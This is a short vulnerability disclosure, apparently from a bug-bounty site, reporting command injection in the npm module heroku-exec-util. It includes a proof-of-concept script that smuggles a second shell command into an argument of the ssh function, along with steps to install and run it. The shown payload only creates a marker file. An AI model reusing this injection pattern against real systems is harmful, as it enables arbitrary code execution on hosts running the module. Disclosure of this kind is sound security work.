Code Injection in heroku/heroku-exec-util


Reported on

Apr 13th 2020


The heroku-exec-util module is vulnerable against RCE since a command is crafted using user inputs not validated and then executed, leading to arbitrary command injection


  1. Create the following PoC file:
// poc.js
var heu = require('heroku-exec-util');
heu.ssh({args:{}},'test; touch HACKED; #','','test',{path:'test'})

  1. Check there aren't files called HACKED
  2. Execute the following commands in another terminal:
npm i heroku-exec-util # Install affected module
node poc.js #  Run the PoC
  1. Recheck the files: now HACKED has been created


to join this conversation